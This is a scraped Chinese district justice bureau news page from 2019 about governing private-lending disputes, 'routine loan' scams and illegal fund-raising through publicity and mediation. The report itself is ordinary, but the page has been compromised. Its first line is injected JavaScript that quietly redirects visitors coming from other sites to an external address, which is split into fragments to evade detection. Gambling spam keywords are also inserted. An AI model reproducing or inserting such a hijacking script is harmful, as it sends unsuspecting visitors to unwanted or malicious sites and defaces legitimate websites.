var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 各地信息
发布日期:2019-10-30 浏览次数: 字号:[ ]

为有效遏制民间借贷纠纷高发多发的势头,深入推进扫黑除恶专项斗争、营造良好法治营商环境,南湖区司法局积极发挥职能作用,积极参与做好民间借贷协同治理工作。  

一是做好宣传,强化防范意识。积极组织开展抵御金融风险法治宣传活动,通过开展摆摊设点宣传咨询、分发防范知识的宣传折等方式,宣传相关法律法规,提高百姓识别“套路贷”、非法集资陷阱等常见的非法民间借贷骗局的能力,引导他们自觉抵制非法集资。在今年的全区人民调解干部培训班上,采取以案说法的形式,对民间借贷过程需要把握的法律知识进行了讲解,让大家知道如何订立借款合同(协议),明确借款期限、约定利息,掌握诉讼时效,以及遇到纠纷时如何主张自己的合法权益,如何使借贷风险降低到最低等知识,同时也提高了广大调解干部的辨别正常借贷和非法集资的能力。广大村(社区)结对律师也利用下村(社区)上法律课的时机,加强相关防范知识的宣传。此外,还通过南湖司法在线等微信公众号加强一些典型案例的宣传。区法律援助中心也积极解答涉及民间借贷相关法律问题的群众咨询,并按照有关规定,给予相应的法律帮助。  

二是化解矛盾,促进社会和谐。积极发挥各级人民调解组织力量,深入排查矛盾纠纷,紧盯重点领域、重点群体和重点人员,余新司法所在矛盾纠纷排查中发现有一例借贷纠纷疑似涉及“放高炮”,及时向余新派出所进行了汇报。针对当前民间借贷引发的不稳定因素,我局充分发挥驻法院调解室、公共法律服务中心联调中心以及各镇街道调委会等调解组织作用,做好民间借贷纠纷和劳资纠纷的调解,及时掌握因民间借贷等引发的职工下岗、失业补助、企业职工与用工单位之间的劳动争议、工资拖欠等串联式纠纷,做到早发现、早处置,确保社会安定。驻法院调解点及时参与调处由法院引调的涉及民间借贷案件,司法局也加强了对此类案件调处的指导,及时向相关调委会提供职业放贷人名单,明确了可以组织调解的案件标准,防止出现一些不适宜调解的案件列入调解范围。  

三是注重预防,强化协同治理。积极加强宣传,控制民间借贷矛盾纠纷新增量。积极参与协同治理,加强与部门间的横向联动,如东栅街道调委会2019年调解涉及民间借贷纠纷15件,金额50余万元,据了解该纠纷涉及债权人逾百人,债权债务金额近千万,因15个债权人与债务人共同向街道调委会申请调解,且双方对借款事项、解决方式都无异议的情况下街道调委会出具了人民调解协议。但考虑到该案涉及人数众多,可能会涉及其他未调解债权人的利益,后与法院沟通,暂停了后续的调解。同时加强了对律师和基层法律服务工作者的教育管理,强化律师事务所、法律服务所内部管理,明确了一旦发现有律师或法律服务工作者参与“套路贷”、虚假诉讼等行为的,一律依照有关规定追究相应法律责任。

南湖区局




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统